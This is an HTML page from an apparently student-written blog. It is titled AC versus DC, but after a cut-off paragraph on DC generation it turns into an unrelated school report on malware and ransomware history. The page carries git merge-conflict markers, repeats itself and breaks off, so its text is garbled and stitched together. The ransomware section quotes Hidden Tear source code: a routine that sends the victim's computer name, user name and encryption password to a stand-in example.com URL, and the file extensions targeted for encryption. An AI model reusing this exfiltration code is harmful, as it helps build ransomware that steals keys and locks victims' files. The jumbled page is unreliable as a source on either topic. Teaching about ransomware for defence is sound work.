<<<<<<< HEAD
<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>AC VS. DC || TAHF.</title>
    <link rel="icon" type="img/png" href="../img/icons/icon.png">

    <!-- Bootstrap Core CSS -->
    <link href="../vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

    <!-- Theme CSS -->
    <link href="../css/clean-blog.min.css" rel="stylesheet">

    <!--Share Buttons CSS -->
    <link rel="stylesheet" type="text/css" href="../css/social-share-kit.css">


    <!-- Custom Fonts -->
    <link href="../vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

</head>

<body>

    <!-- Navigation -->
    <nav class="navbar navbar-default navbar-custom navbar-fixed-top">
        <div class="container-fluid">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header page-scroll">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                    <span class="sr-only">Toggle navigation</span>
                    Menu <i class="fa fa-bars"></i>
                </button>
                <a href="../index.html"><img src="../img/icons/icon.jpg" width="80px"></a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="../index.html">Home</a>
                    </li>
                    <li>
                        <a href="../posts.html">Work</a>
                    </li>
                    <li>
                        <a href="../about.html">About</a>
                    </li>
                    <li>
                        <a href="../post.html">Sample Post</a>
                    </li>
                    <li>
                        <a href="../contact.html">Contact</a>
                    </li>
                </ul>
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container -->
    </nav>

    <!-- Page Header -->
    <!-- Set your background image for this header on the line below. -->
    <header class="intro-header" style="background-image: url('../img/backgrounds/home-bg.jpg')">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    <div class="post-heading">
                        <h1>Alternate Current VS. Direct Current</h1>
                        <h1 class="subheading">Presented on May [], 2017</h1>                        
                        <span class="meta">Written by <a href="../about.html">Tahfimul Latif</a> on May 2, 2017</span>
                        <span class="meta">Last edited by <a href="../about.html">Tahfimul Latif</a> on {}</span>
                        <span class="meta">Share this: </span>
                        
                        <iframe src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Fplugins%2F&layout=button_count&size=small&mobile_iframe=true&width=86&height=20&appId" width="95" height="20" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true">Facebook</iframe>

                        <a href="https://twitter.com/share" class="twitter-share-button" data-text="TAHF. BLOGS is a personal blog of a programmer&#39;s experience." data-url="https://publish.twitter.com/#" data-show-count="false">Tweet </a>
                    </div>
                </div>
            </div>
        </div>
    </header>

    <!-- Post Content -->
    <article>
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">                    

                    <p>Everyday we make use technology developed by inventors. However, we do not understand their process.</p>

                    <p>This assignment was one that was assigned by my engineering teacher that led me to find out about the dirrence between Alternating Current(AC) and Direct Current(DC).</p>

                    <h2 class="section-heading">History</h2>

                    <p>In order to understand the diference, I had to travel back in time to the period of Thomas Edison. He was the inventor of DC. Its current flow was steady and flowed in one direction.</p>

                    <p>In order to produce this current, the proccess began with a Steam Engine. Steam Engines require, burning Oil, Wood or Coal to run. Once it runs, it produces steam. The steam is carried out by a Valve System, which controls its flow. The Valve System is connected to a Piston, pushing it up and down. A Piston Rod is attached to the Piston. The Piston Rod connects to a Crank Shaft, rotating it in a circular motion. That then rotates a Fly Wheel attached to a Generator using a Drive Belt that connect them. The Generator contains Permanent Magents and Coils of copper wire that connect to a commutator. A commutator </p>

                    <h2 class="section-heading">When did it start?</h2>

                    <p>Malware Attacks in personal computers date back to 1986. A man by the name of Amjad Farooq Alvi and his fellow have decided to invent a friendly virus for experimental purposes. They did so by infecting floppy disks with their virus called "Brain". Their virus soon spread around the globe and turned into a tool for committing evil acts by criminals.</p>

                    <h2 class="section-heading">Continuation</h2>

                    <p>Ruthless criminals found better and more sophesticated methods of harming victims.</p>

                    <p>Over a decade after the release of Brain, CIH otherwise known as Chernobyl Virus was born. A man by the name of Chen Ing-hau had invented the virus. Unlike it predecessors, Chernobyl had the ability to rewrite data on a computer's hard drive. Chernobyl was able to attack every application as the user accessed them and hide beneath the application by expanding its file size. Its presence could then be detected using an anti-virus software. A special ability of CIH was to re-write the Flash BIOS chip of computers. This led to the computer not booting up at all. The ultimate method of fixing it was to reprogram the chip.</p>                   

                    <p>Later, as the age of the internet was born, viruses started to spread through email. One of which was the Kak invented by Mayur Kamat.</p>

                    <blockquote>" ...Kak...[was]...one of the very few true email viruses (1999) " <a href="https://www.lifewire.com/brief-history-of-malware-153616" target="about_blank">(Lifewire)</a></blockquote>

                    <h2 class="section-heading">What are some tools used to create Malware?</h2>

                    <p>There are many tools available to create Malware both for newbies and experienced.</p>

                    <p>VBS Worm Generator is a tool that is used to create an email worm. Its job is to effect a victim through sending an email and self replicate through sending emails to contacts under the victim's contact list.</p>

                    <h2 class="section-heading">Specific type of Malware: Ransomware</h2>

                    <p>My teacher told us to research a specific type of malware attack. I choose Ransomware.</p>
                    
                    <h2 class="section-heading">History of Ransomware</h2>
                    <p>It was started by a person named Joseph L. Popp. He decided to infect floppy disks with the first ransomware that he invented in 1989. The Ransomware was known as PC Cyborg. He then handed those disks out to 20,000 people in an AIDS conference. The victims were affected and were asked to pay ransom to a given address. Joseph was later caught by authorities, but never tried due to his mental condition.</p>

                    <h2 class="section-heading">Evolution of Ransomware</h2>

                    <p>The age of the internet played a huge role in the development of Ransomware.</p>

                    <p>In 2005, criminals exploited advertisements asking victims to download misleading apps that would remove junk files from their computers. The victims often paid fees to obtain those software. In return, most of them were not effective at removing junk files. This was the pre-Ransomware era on the internet.</p>

                    <p>Later down the road, Tojans such as GpCoder started to emerge. It had the ability to look for certain file types in a computer and create a copy of the file. It would then delete the original file and make the copied file unable to be read. The start of Ransomware era on the internet.</p>

                    <p>As trojans of such are becoming more sopesticated, Ransomware bussiness is getting bigger by the day.</p>

                    <p>Here are sources that Ransomware enter through:</p>

                    <img src="../img/pages/posts/malware/Ransomware Sources.png" width="600px">

                    <span class="caption text-muted">Source: <a href="http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/">Systweak</a></span>

                    <h2 class="section-heading">Types of Ransomware</h2>

                    <p>There are many types of Ransomware that have attacked victims. The pie chart below shows the most recent ones used as of this date:</p>

                    <img src="../img/pages/posts/malware/top10families-2015-2016.png">

                    <span class="caption text-muted">Source: <a href="https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx">Microsoft</a></span>

                    <p>According to the latest data above, Tescrypt has been the most used Ransomware. It is a form of Crypto Ransomware.</p>

                    <p>RAA is another type of Ransomware that has been recently used. This is byfar the most known sophesticated Ransomware that has been used.</p>

                    <h2 class="section-heading">Kinds of functions of Ransomware</h2>

                    <p>There are two kinds of functions that Ransomware offer, Locker Ransomware and Crypto Ransomware.</p>

                    <h2 class="section-heading">Locker Ransomware</h2>

                    <p>Locker Ransomware looks for certain file types in a computer and encrypts the data.</p>

                    <h2 class="section-heading">Crypto Ransomware</h2>

                    <p>Crypto Ransomware locks down an entire operating by rewriting the Master Boot Records (MBR) on the hard drive. MBR is a section of a hard drive that has instructions stored for booting up.</p>

                    <h2 class="section-heading">Tools used to create Ransomware</h2>

                    <p>Just as with Malwares in general, there are several tools out there that can be used to create Ransomware. Two of which I found out are Shark and The Hidden Tear. Shark allows creators to customize the Ransomware to suit their purpose. However, The Hidden Tear is a simple tool that highlights the basic functions of a Ransomware. I looked into this tool to be able to show the class and teach them some basic concepts of a Ransomware.</p>

                    <p>The Hidden Tear consits of several files. Two of the main files are "Hidden-Tear-Decrypter" and "Hiden-Tear". "Hidden-Tear" is an exe file and a Locker Ransomware that encrypts data. The "Hidden-Tear-Decrypter" is another exe that is used to decrypt the files that were encrypted. This is not a harmful nor sophisticated form of Ransomware. It has been created for begginners to play around with. You may wish to check it out <strong>for experimental purposes only. Keep in mind that if you try it on devices of which owners did not permit, it would be a crime.</strong></p>

                    <p>In order to set up the decrypter for this Ransomware, a web server needs to be set up. The web server has to support either PHP or Python language. Then you need to edit the following by replacing the targetURL with a website that you created to retrieve the private decryption key.</p>

                    <blockquote>“string targetURL = "https://www.example.com/hidden-tear/write.php?info=";” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>)</blockquote>

                    <p>Next crucial part of the code to look at is the "Sending Process"</p>

                    <blockquote>“SendPassword() {<br>
                    string info = computerName + "-" + userName + " " + password;<br>
                    var fullUrl = targetURL + info;<br>
                    var conent = new System.Net.WebClient().DownloadString(fullUrl);<br>
                    }” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>) 
                    </blockquote>

                    <p>This is the proccess that will handle request for a decryption code for the decrypter.</p>

                    <p>Last part to look at are the file extensions that the encrypter will look for.</p>

                    <blockquote>“ var validExtensions = new[]{ <br>
                    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
                    <br>}; ” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>)</blockquote>

                    <p>The Hidden Tear comes default with these file extensions. However, you have the choice to modify them.</p>

                    <p><strong>If you are going to try this, please use a virtual machine on devices that you choose to use it on. This guide is for educational purposes only.</strong></p>

                    <h2 class="section-heading">Hidden Tear Demonstration</h2>

                    <p><iframe width="560" height="315" src="https://www.youtube.com/embed/LtiRISepIfs" frameborder="0" allowfullscreen></iframe></p>

                    <h2 class="section-heading">How do users get attacked?</h2>

                    <p>There are many social engineering skills that are used to get a user to download the payload. A payload is simply a downloader. Once the payload has been downloaded, it connects to the hacker's server. In the downloading process, a public encryption key is sent. That key starts to encrypt data in your computer.</p>

                    <p>If you remember, a little ago we talked about RAA Ransomware. This Ransomware is different in that it is the Ransomware itself. Therefore, no Payload is need to get the public encryption key. It is eaiser for a criminal to attack a computer using this tactic.</p>

                    <p>Once the data has been locked down, a message similar to the one below is displayed:</p>

                    <img src="http://insurancethoughtleadership.com/wp-content/uploads/2015/08/police.png">

                    <span class="caption text-muted">Source: (<a href="https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwjwnsK14qXTAhXDjpAKHb1kASkQjxwIAw&url=http%3A%2F%2Finsurancethoughtleadership.com%2Fransomware-your-money-or-your-data%2F&psig=AFQjCNH4rgHYWOrSNXajIyu4IYKb5DuD6g&ust=1492321889209916">Insurance Thought Leadership</a>) </span>

                    <p>As you can see from the image, the hacker is asking to be paid in the form of electronic currency. The currency is called "Bitcoin". Hackers prefer to use this over monetary value due to it being hard to track. Authorities are finding it difficult to catch these bad guys for this reason.</p>

                    <p>Another factor is that the server will wait for a certain time period. As seen on the image above, 72 Hours would be an example. Therefore, if a victim wanted to pay Ransom to get their files back, they would not be able to do so after the given time period.</p>

                    <h2 class="section-heading">How much is payed?</h2>

                    <p>According to <a href="https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/" target="about_blank">onthewire</a>, 600 companies who were victims of this kind of attack were surveyed. It was identified that about 45% of them have payed between $20,000 to amounts greater than $40,000. Most of the hackers tend to attack big corporates because there is a higher chance of big profit.</p>

                    <h2 class="section-heading">How do the files get decrypted?</h2>

                    <p>Once the victims pay the fee, the hacker's server sends back a Private Decryption Key to the victim. This Private Decryption Key unlocks the data that have been locked. However, there is no guarantee that the hacker will send the Private Decryption Key to the user. This is why it is better to say no and start from scratch or from back up.</p>

                    <p>Even if you get your files back, you are at a greater risk of being attacked again. The hackers usually attach a piece of software with the Private Decryption Key which will keep the data alive. One example of such software would be a Key Logger. Key Loggers log every key that is being typed by a user. This makes it possible for the hacker to steal personal information. If your anti-virus happens to detect the malicious software and you remove it, your data will be lost forever.</p>

                    <h2 class="section-heading">What can you do to protect yourself?</h2>

                    <p>There are several options available to protect yourself from Ransomware or other Malware Attacks.</p>

                    <p>1. Create a back up of your entire operating system in an external hard drive.</p>

                    <p>2. Update every software on your computer to their latest versions.</p>

                    <p>3. NEVER click on unwanted sources or sources that you do not know about on the internet. This includes getting an email from somebody whom you should not have received an email from. You should double check the sender of the emails you receive.</p>

                    <p>4. Edit Firewall settings on your computer. Firewall is a tool that handles network permissions for applications that run on your computer. A hacker will not be able to establish a connection through applications if you do not permit the applications to connect to a network.</p>

                    <p>5. If you use Windows, there is a feature called user control. User control notifies you everytime a new application tries to make changes to your computer.</p>

                    <h2 class="section-heading">Presentation</h2>

                    <p>Here is the presentation that I presented to my engineering class.</p>

                    <iframe src="https://docs.google.com/presentation/d/1iscy1zGikkpysmj1ZMWLEzoMcrFAaU7vKZ8Lm88rs8A/embed?start=true&loop=true&delayms=3000" frameborder="0" width="600" height="450" allowfullscreen="true" mozallowfullscreen="true" webkitallowfullscreen="true"></iframe>

                    <h2 class="section-heading">Sources</h2>

                    <p>1. <a href="https://techterms.com/definition/malware" target="about_blank">https://techterms.com/definition/malware</a></p>

                    <p>2. <a href="http://www.computerhope.com/vcih.htm" target="about_blank">http://www.computerhope.com/vcih.htm</a></p>

                    <p>3. <a href="https://www.f-secure.com/v-descs/iworm.shtml" target="about_blank">https://www.f-secure.com/v-descs/iworm.shtml</a></p>

                    <p>4. <a href="https://www.lifewire.com/brief-history-of-malware-153616" target="about_blank">https://www.lifewire.com/brief-history-of-malware-153616</a></p>

                    <p>5. <a href="https://blog.varonis.com/a-brief-history-of-ransomware/" target="about_blank">https://blog.varonis.com/a-brief-history-of-ransomware/</a></p>

                    <p>6. <a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-evolution-of-ransomware.pdf" target="about_blank">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-evolution-of-ransomware.pdf</a></p>

                    <p>7. <a href="http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/" target="about_blank">http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/</a></p>

                    <p>8. <a href="https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx" target="about_blank">https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx</a></p>

                    <p>9. <a href="https://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/" target="about_blank">https://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/</a></p>

                    <p>10. <a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html" target="about_blank">http://thehackernews.com/2015/08/ransomware-creator-toolkit.html</a></p>

                    <p>11. <a href="https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/" target="about_blank">https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/</a></p>

                    <p>12. <a href="https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/" target="about_blank">https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/</a></p>

                    <p>13. <a href="https://www.youtube.com/watch?v=LtiRISepIfs&feature=youtu.be">https://www.youtube.com/watch?v=LtiRISepIfs&feature=youtu.be</a></p>

                    <span class="meta">Share this: </span>
                        
                        <iframe src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Fplugins%2F&layout=button_count&size=small&mobile_iframe=true&width=86&height=20&appId" width="95" height="20" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true">Facebook</iframe>

                        <a href="https://twitter.com/share" class="twitter-share-button" data-text="TAHF. BLOGS is a personal blog of a programmer&#39;s experience." data-url="https://publish.twitter.com/#" data-show-count="false">Tweet </a>

                    <hr>

                     <!-- Pager -->
                    <ul class="pager">
                      <li>
                        <a href="../posts.html">&larr; Go Back</a>
                      </li>
                    </ul> 

                </div>
            </div>
        </div>
    </article>

    <hr>

    <!-- Footer -->
    <footer>
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    <p class="copyright text-muted">Copyright &copy; TAHF. BLOGS 2017.</p>
                </div>
            </div>
        </div>
    </footer>

    <!-- Twitter Share Button-->
    <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

    <!-- Share Buttons JavaScript -->
    <script src="../js/social-share-kit.js"></script>
    <script src="../js/social-share-kit.min.js"></script>

    <!-- jQuery -->
    <script src="../vendor/jquery/jquery.min.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="../vendor/bootstrap/js/bootstrap.min.js"></script>

    <!-- Contact Form JavaScript -->
    <script src="../js/jqBootstrapValidation.js"></script>
    <script src="~/js/contact_me.js"></script>

    <!-- Theme JavaScript -->
    <script src="../js/clean-blog.min.js"></script>

</body>

</html>
=======
<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>AC VS. DC || TAHF.</title>
    <link rel="icon" type="img/png" href="../img/icons/icon.png">

    <!-- Bootstrap Core CSS -->
    <link href="../vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

    <!-- Theme CSS -->
    <link href="../css/clean-blog.min.css" rel="stylesheet">

    <!--Share Buttons CSS -->
    <link rel="stylesheet" type="text/css" href="../css/social-share-kit.css">


    <!-- Custom Fonts -->
    <link href="../vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

</head>

<body>

    <!-- Navigation -->
    <nav class="navbar navbar-default navbar-custom navbar-fixed-top">
        <div class="container-fluid">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header page-scroll">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                    <span class="sr-only">Toggle navigation</span>
                    Menu <i class="fa fa-bars"></i>
                </button>
                <a href="../index.html"><img src="../img/icons/icon.jpg" width="80px"></a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="../index.html">Home</a>
                    </li>
                    <li>
                        <a href="../posts.html">Work</a>
                    </li>
                    <li>
                        <a href="../about.html">About</a>
                    </li>
                    <li>
                        <a href="../post.html">Sample Post</a>
                    </li>
                    <li>
                        <a href="../contact.html">Contact</a>
                    </li>
                </ul>
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container -->
    </nav>

    <!-- Page Header -->
    <!-- Set your background image for this header on the line below. -->
    <header class="intro-header" style="background-image: url('../img/backgrounds/home-bg.jpg')">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    <div class="post-heading">
                        <h1>Alternate Current VS. Direct Current</h1>
                        <h1 class="subheading">Presented on May [], 2017</h1>                        
                        <span class="meta">Written by <a href="../about.html">Tahfimul Latif</a> on May 2, 2017</span>
                        <span class="meta">Last edited by <a href="../about.html">Tahfimul Latif</a> on {}</span>
                        <span class="meta">Share this: </span>
                        
                        <iframe src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Fplugins%2F&layout=button_count&size=small&mobile_iframe=true&width=86&height=20&appId" width="95" height="20" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true">Facebook</iframe>

                        <a href="https://twitter.com/share" class="twitter-share-button" data-text="TAHF. BLOGS is a personal blog of a programmer&#39;s experience." data-url="https://publish.twitter.com/#" data-show-count="false">Tweet </a>
                    </div>
                </div>
            </div>
        </div>
    </header>

    <!-- Post Content -->
    <article>
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">                    

                    <p>Everyday we make use technology developed by inventors. However, we do not understand their process.</p>

                    <p>This assignment was one that was assigned by my engineering teacher that led me to find out about the dirrence between Alternating Current(AC) and Direct Current(DC).</p>

                    <h2 class="section-heading">History</h2>

                    <p>In order to understand the diference, I had to travel back in time to the period of Thomas Edison. He was the inventor of DC. Its current flow was steady and flowed in one direction.</p>

                    <p>In order to produce this current, the proccess began with a Steam Engine. Steam Engines require, burning Oil, Wood or Coal to run. Once it runs, it produces steam. The steam is carried out by a Valve System, which controls its flow. The Valve System is connected to a Piston, pushing it up and down. A Piston Rod is attached to the Piston. The Piston Rod connects to a Crank Shaft, rotating it in a circular motion. That then rotates a Fly Wheel attached to a Generator using a Drive Belt that connect them. The Generator contains Permanent Magents and Coils of copper wire that connect to a commutator. A commutator </p>

                    <h2 class="section-heading">When did it start?</h2>

                    <p>Malware Attacks in personal computers date back to 1986. A man by the name of Amjad Farooq Alvi and his fellow have decided to invent a friendly virus for experimental purposes. They did so by infecting floppy disks with their virus called "Brain". Their virus soon spread around the globe and turned into a tool for committing evil acts by criminals.</p>

                    <h2 class="section-heading">Continuation</h2>

                    <p>Ruthless criminals found better and more sophesticated methods of harming victims.</p>

                    <p>Over a decade after the release of Brain, CIH otherwise known as Chernobyl Virus was born. A man by the name of Chen Ing-hau had invented the virus. Unlike it predecessors, Chernobyl had the ability to rewrite data on a computer's hard drive. Chernobyl was able to attack every application as the user accessed them and hide beneath the application by expanding its file size. Its presence could then be detected using an anti-virus software. A special ability of CIH was to re-write the Flash BIOS chip of computers. This led to the computer not booting up at all. The ultimate method of fixing it was to reprogram the chip.</p>                   

                    <p>Later, as the age of the internet was born, viruses started to spread through email. One of which was the Kak invented by Mayur Kamat.</p>

                    <blockquote>" ...Kak...[was]...one of the very few true email viruses (1999) " <a href="https://www.lifewire.com/brief-history-of-malware-153616" target="about_blank">(Lifewire)</a></blockquote>

                    <h2 class="section-heading">What are some tools used to create Malware?</h2>

                    <p>There are many tools available to create Malware both for newbies and experienced.</p>

                    <p>VBS Worm Generator is a tool that is used to create an email worm. Its job is to effect a victim through sending an email and self replicate through sending emails to contacts under the victim's contact list.</p>

                    <h2 class="section-heading">Specific type of Malware: Ransomware</h2>

                    <p>My teacher told us to research a specific type of malware attack. I choose Ransomware.</p>
                    
                    <h2 class="section-heading">History of Ransomware</h2>
                    <p>It was started by a person named Joseph L. Popp. He decided to infect floppy disks with the first ransomware that he invented in 1989. The Ransomware was known as PC Cyborg. He then handed those disks out to 20,000 people in an AIDS conference. The victims were affected and were asked to pay ransom to a given address. Joseph was later caught by authorities, but never tried due to his mental condition.</p>

                    <h2 class="section-heading">Evolution of Ransomware</h2>

                    <p>The age of the internet played a huge role in the development of Ransomware.</p>

                    <p>In 2005, criminals exploited advertisements asking victims to download misleading apps that would remove junk files from their computers. The victims often paid fees to obtain those software. In return, most of them were not effective at removing junk files. This was the pre-Ransomware era on the internet.</p>

                    <p>Later down the road, Tojans such as GpCoder started to emerge. It had the ability to look for certain file types in a computer and create a copy of the file. It would then delete the original file and make the copied file unable to be read. The start of Ransomware era on the internet.</p>

                    <p>As trojans of such are becoming more sopesticated, Ransomware bussiness is getting bigger by the day.</p>

                    <p>Here are sources that Ransomware enter through:</p>

                    <img src="../img/pages/posts/malware/Ransomware Sources.png" width="600px">

                    <span class="caption text-muted">Source: <a href="http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/">Systweak</a></span>

                    <h2 class="section-heading">Types of Ransomware</h2>

                    <p>There are many types of Ransomware that have attacked victims. The pie chart below shows the most recent ones used as of this date:</p>

                    <img src="../img/pages/posts/malware/top10families-2015-2016.png">

                    <span class="caption text-muted">Source: <a href="https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx">Microsoft</a></span>

                    <p>According to the latest data above, Tescrypt has been the most used Ransomware. It is a form of Crypto Ransomware.</p>

                    <p>RAA is another type of Ransomware that has been recently used. This is byfar the most known sophesticated Ransomware that has been used.</p>

                    <h2 class="section-heading">Kinds of functions of Ransomware</h2>

                    <p>There are two kinds of functions that Ransomware offer, Locker Ransomware and Crypto Ransomware.</p>

                    <h2 class="section-heading">Locker Ransomware</h2>

                    <p>Locker Ransomware looks for certain file types in a computer and encrypts the data.</p>

                    <h2 class="section-heading">Crypto Ransomware</h2>

                    <p>Crypto Ransomware locks down an entire operating by rewriting the Master Boot Records (MBR) on the hard drive. MBR is a section of a hard drive that has instructions stored for booting up.</p>

                    <h2 class="section-heading">Tools used to create Ransomware</h2>

                    <p>Just as with Malwares in general, there are several tools out there that can be used to create Ransomware. Two of which I found out are Shark and The Hidden Tear. Shark allows creators to customize the Ransomware to suit their purpose. However, The Hidden Tear is a simple tool that highlights the basic functions of a Ransomware. I looked into this tool to be able to show the class and teach them some basic concepts of a Ransomware.</p>

                    <p>The Hidden Tear consits of several files. Two of the main files are "Hidden-Tear-Decrypter" and "Hiden-Tear". "Hidden-Tear" is an exe file and a Locker Ransomware that encrypts data. The "Hidden-Tear-Decrypter" is another exe that is used to decrypt the files that were encrypted. This is not a harmful nor sophisticated form of Ransomware. It has been created for begginners to play around with. You may wish to check it out <strong>for experimental purposes only. Keep in mind that if you try it on devices of which owners did not permit, it would be a crime.</strong></p>

                    <p>In order to set up the decrypter for this Ransomware, a web server needs to be set up. The web server has to support either PHP or Python language. Then you need to edit the following by replacing the targetURL with a website that you created to retrieve the private decryption key.</p>

                    <blockquote>“string targetURL = "https://www.example.com/hidden-tear/write.php?info=";” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>)</blockquote>

                    <p>Next crucial part of the code to look at is the "Sending Process"</p>

                    <blockquote>“SendPassword() {<br>
                    string info = computerName + "-" + userName + " " + password;<br>
                    var fullUrl = targetURL + info;<br>
                    var conent = new System.Net.WebClient().DownloadString(fullUrl);<br>
                    }” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>) 
                    </blockquote>

                    <p>This is the proccess that will handle request for a decryption code for the decrypter.</p>

                    <p>Last part to look at are the file extensions that the encrypter will look for.</p>

                    <blockquote>“ var validExtensions = new[]{ <br>
                    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
                    <br>}; ” (<a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html">The Hacker News</a>)</blockquote>

                    <p>The Hidden Tear comes default with these file extensions. However, you have the choice to modify them.</p>

                    <p><strong>If you are going to try this, please use a virtual machine on devices that you choose to use it on. This guide is for educational purposes only.</strong></p>

                    <h2 class="section-heading">Hidden Tear Demonstration</h2>

                    <p><iframe width="560" height="315" src="https://www.youtube.com/embed/LtiRISepIfs" frameborder="0" allowfullscreen></iframe></p>

                    <h2 class="section-heading">How do users get attacked?</h2>

                    <p>There are many social engineering skills that are used to get a user to download the payload. A payload is simply a downloader. Once the payload has been downloaded, it connects to the hacker's server. In the downloading process, a public encryption key is sent. That key starts to encrypt data in your computer.</p>

                    <p>If you remember, a little ago we talked about RAA Ransomware. This Ransomware is different in that it is the Ransomware itself. Therefore, no Payload is need to get the public encryption key. It is eaiser for a criminal to attack a computer using this tactic.</p>

                    <p>Once the data has been locked down, a message similar to the one below is displayed:</p>

                    <img src="http://insurancethoughtleadership.com/wp-content/uploads/2015/08/police.png">

                    <span class="caption text-muted">Source: (<a href="https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwjwnsK14qXTAhXDjpAKHb1kASkQjxwIAw&url=http%3A%2F%2Finsurancethoughtleadership.com%2Fransomware-your-money-or-your-data%2F&psig=AFQjCNH4rgHYWOrSNXajIyu4IYKb5DuD6g&ust=1492321889209916">Insurance Thought Leadership</a>) </span>

                    <p>As you can see from the image, the hacker is asking to be paid in the form of electronic currency. The currency is called "Bitcoin". Hackers prefer to use this over monetary value due to it being hard to track. Authorities are finding it difficult to catch these bad guys for this reason.</p>

